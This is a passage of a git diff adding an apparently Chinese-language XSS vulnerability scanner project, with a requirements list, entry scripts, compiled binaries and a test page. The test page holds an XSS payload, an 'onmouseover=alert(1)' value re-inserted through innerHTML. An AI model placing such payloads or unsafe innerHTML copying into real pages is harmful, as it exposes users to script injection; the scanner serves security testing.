+<div id="div1"><input value="``onmouseover=alert(1)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> 
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..99b7b24
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,24 @@
+requests>=2.28.0
+beautifulsoup4>=4.11.0
+lxml>=4.9.0
+selenium>=4.3.0
+urllib3>=1.26.9
+colorama>=0.4.5
+tqdm>=4.64.0
+argparse>=1.4.0
+python-dotenv>=0.20.0
+cssselect>=1.1.0
+webdriver-manager>=3.8.0
+dnspython>=2.2.1
+pycurl>=7.45.1
+flask>=2.1.2
+pyOpenSSL>=22.0.0
+cryptography>=37.0.2
+html2text>=2020.1.16
+chardet>=5.0.0
+certifi>=2022.6.15
+pillow>=9.1.1
+parsel>=1.6.0
+aiohttp>=3.8.1
+nest_asyncio>=1.5.5
+yarl>=1.7.2 
\ No newline at end of file
diff --git a/xss_scanner.py b/xss_scanner.py
new file mode 100644
index 0000000..a07c48e
--- /dev/null
+++ b/xss_scanner.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS深度漏洞扫描器 - 主入口脚本
+"""
+
+import os
+import sys
+
+# 添加当前目录到Python路径
+sys.path.append(os.path.dirname(os.path.abspath(__file__)))
+
+# 导入主模块
+from xss_scanner.main import main
+
+if __name__ == "__main__":
+    # 调用主函数
+    main() 
\ No newline at end of file
diff --git a/xss_scanner/__init__.py b/xss_scanner/__init__.py
new file mode 100644
index 0000000..c060e15
--- /dev/null
+++ b/xss_scanner/__init__.py
@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS深度漏洞扫描器 - 包初始化
+"""
+
+__version__ = '1.0.0'
+__author__ = '高级渗透工程师'
+__description__ = '一个全面的Web应用安全扫描工具，专注于检测XSS漏洞，同时也能够发现其他类型的Web安全漏洞。' 
\ No newline at end of file
diff --git a/xss_scanner/__pycache__/__init__.cpython-313.pyc b/xss_scanner/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..ad536d00f04f8fd0ba1d0dde01a5075fe12311b2
GIT binary patch
literal 461
zcmey&%ge<81Uq!krkgV|FgylvU;xMmgU=#BYAQo8LlHwTV-aI8QxQ`za}jeoizaKS
zCQyniA~^Wj_Ki<>Eqk`7|Jjy#&pKB>>+gR$bA^Jg!qcACryX;jF7JNYGmWc?)lkns
z&!AKksOjbE8P9huf3{=#%ZC1^+m}9H(fxEsM`;~U=E;tRCp%U>ZC&wl?xN?jTEbJ4
zp6;6Re9DTa>pFpgP{X$`ecHPH{hppDJ0?HdyyD5OzGsUYo^9<0xdiM6pw!a|J<q0Z
zd$M!>i{`ygm&||KKk<3rhNrFDp6s6XeB<t?^SYsiLyQIMdfd?Dr^#}QJw84qKRG`B
z7I%DnS!z*nW_})!!xbN&SXz>iUj$_H168CJCl_TFlz=5yGJFQQoZ*(EvsFxJF;Gj4
zk-4FfS&U15d0tL_VoGrg&}H$#$%%P+sYSZEiJ5sZ6~)Ez#Snp*`1s7c%#!$cy@JYH
z95%W6DWy57c14^(6G3rMEC(b$Ff%eTe&k?cWck3sz%SOoeS=q}f$IYkgK#iYBYzP)
GPzeBQKghoT

literal 0
HcmV?d00001

diff --git a/xss_scanner/__pycache__/main.cpython-313.pyc b/xss_scanner/__pycache__/main.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..97d4fbfd2352130f3e0f9bb0a5bb79cf54a4270d
GIT binary patch
literal 7383
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
DtL4Ad

literal 0
HcmV?d00001

diff --git a/xss_scanner/core/__init__.py b/xss_scanner/core/__init__.py
new file mode 100644
index 0000000..7c9de28
--- /dev/null
+++ b/xss_scanner/core/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 核心包""" 
\ No newline at end of file
diff --git a/xss_scanner/core/__pycache__/__init__.cpython-313.pyc b/xss_scanner/core/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..600b236c17b6f4e229d760bcdcddbed01b96f18e
GIT binary patch
literal 209
zcmey&%ge<81Uq!krpp8A#~=<2FhUuhIe?6*48aUV4C#!TOr;V)ZbWeKv(DAe`um^G
zT%n+=@NB`3r~8|q_O$wGGTvg3k59=@j*nl-@EK&nEjMSYn9$<XqT(1Mb3-Gu7?=F=
zyqx^Rl;RkmDe=L{iFtXcMY_3(nRzi4#l`W(5P_KF{G!yD`1s7c%#!$cy@JYH95%W6
fDWy57c13JJV?nMf2D$75Gb1D8Ee5$F79a-zPL)0c

literal 0
HcmV?d00001

diff --git a/xss_scanner/core/__pycache__/config.cpython-313.pyc b/xss_scanner/core/__pycache__/config.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..66c1990665291f5e866f1e4d2673dde3f1b3189e
GIT binary patch
literal 17160
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
